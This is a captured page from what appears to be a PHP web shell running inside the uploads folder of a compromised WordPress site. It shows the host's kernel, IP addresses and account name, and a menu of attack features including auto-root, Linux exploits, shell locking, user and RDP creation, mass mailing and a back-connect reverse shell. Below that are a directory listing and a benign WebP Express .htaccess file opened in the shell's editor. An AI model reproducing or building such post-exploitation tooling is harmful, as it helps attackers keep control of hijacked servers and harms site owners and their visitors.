Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
agenci18 /
public_html /
wp-content /
uploads /
[ HOME SHELL ]
Name
Size
Permission
Action
2023
[ DIR ]
drwxr-xr-x
2024
[ DIR ]
drwxr-xr-x
2025
[ DIR ]
drwxr-xr-x
2026
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
dpwap_logs
[ DIR ]
drwxr-xr-x
elementor
[ DIR ]
drwxr-xr-x
epm-exports
[ DIR ]
drwxr-xr-x
media-library-organizer-temp
[ DIR ]
drwxr-xr-x
pdfs
[ DIR ]
drwxr-xr-x
popularfx-templates
[ DIR ]
drwxr-xr-x
presto-player-private
[ DIR ]
drwxr-xr-x
template-kits
[ DIR ]
drwxr-xr-x
wp-file-manager-pro
[ DIR ]
drwxr-xr-x
wpallexport
[ DIR ]
drwxr-xr-x
wpallimport
[ DIR ]
drwxr-xr-x
wpcode
[ DIR ]
drwxr-xr-x
wppe-exports
[ DIR ]
drwxr-xr-x
.htaccess
3.37
KB
-rw-r--r--
mwai_xOVr4BBd.log
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# BEGIN WebP Express # The rules below have been dynamically created by WebP Express in accordance with the plugin settings # DO NOT EDIT MANUALLY (unless you are prepared that your changes might be overridden by WebP Express) # The following parameters have been in play to produce the rules: # # WebP Express options: # - Operation mode: varied-image-responses # - Redirection to existing webp: disabled # - Redirection to converter: enabled # - Redirection to converter to create missing webp files upon request for the webp: enabled # - Destination folder: separate # - Destination extension: append # - Destination structure: image-roots # - Image types: jpeg, png # - Alter HTML enabled?: yes # # Wordpress/Server configuration: # - Document root availablity: Available and its "realpath" is available too. Can be used for structuring cache dir. # # .htaccess capability test results: # - mod_header working?: yes # - pass variable from .htaccess to script through header working?: no # - pass variable from .htaccess to script through environment variable working?: yes # # Role of the dir that this .htaccess is located in: # - Is this .htaccess in a dir containing source images?: yes # - Is this .htaccess in a dir containing webp images?: no # Rules for handling requests for source images # --------------------------------------------- <IfModule mod_rewrite.c> RewriteEngine On # Escape hatch #1: Adding ?dontreplace to an url can be used to bypass redirection RewriteCond %{QUERY_STRING} dontreplace$ RewriteCond %{REQUEST_FILENAME} -f RewriteRule . - [L] # Escape hatch #2: Placing an empty file in the same folder as the jpeg/png which has same file name, but ".dontreplace" appended will bypass redirection RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$ RewriteCond %1%2\.dontreplace -f RewriteRule . - [L] # Deprecated escape hatch: Adding ?original to an url can be used to bypass redirection RewriteCond %{QUERY_STRING} original$ RewriteCond %{REQUEST_FILENAME} -f RewriteRule . - [L] # Deprecated escape hatch: Placing an empty file in the same folder as the jpeg/png which has same file name, but ".do-not-convert" appended will bypass redirection RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$ RewriteCond %1%2\.do-not-convert -f RewriteRule . - [L] # Avoid redirecting to webp files that are bigger than the original RewriteCond %{REQUEST_FILENAME} -f RewriteCond %{REQUEST_FILENAME} (?i)(/home/agenci18/public_html/wp-content/uploads/)(.*)(\.jpe?g|\.png)$ RewriteCond /home/agenci18/public_html/wp-content/webp-express/webp-images-bigger-than-source/uploads/%2%3.webp -f RewriteRule . - [L] # Redirect images to webp-on-demand.php (if browser supports webp) RewriteCond %{HTTP_ACCEPT} image/webp RewriteCond %{REQUEST_FILENAME} -f RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$ RewriteRule (?i).*$ /wp-content/plugins/webp-express/wod/webp-on-demand.php [E=WE_WP_CONTENT_REL_TO_WE_PLUGIN_DIR:../../,E=WE_SOURCE_REL_HTACCESS:$0,E=WE_HTACCESS_ID:uploads,E=HASH:f43e85c046b7e3a450cb217dc007d2cc,NC,L] # Make sure that browsers which does not support webp also gets the Vary:Accept header # when requesting images that would be redirected to webp on browsers that does. <IfModule mod_headers.c> <FilesMatch "(?i)\.(jpe?g|png)$"> Header append "Vary" "Accept" </FilesMatch> </IfModule> </IfModule> # END WebP Express
Close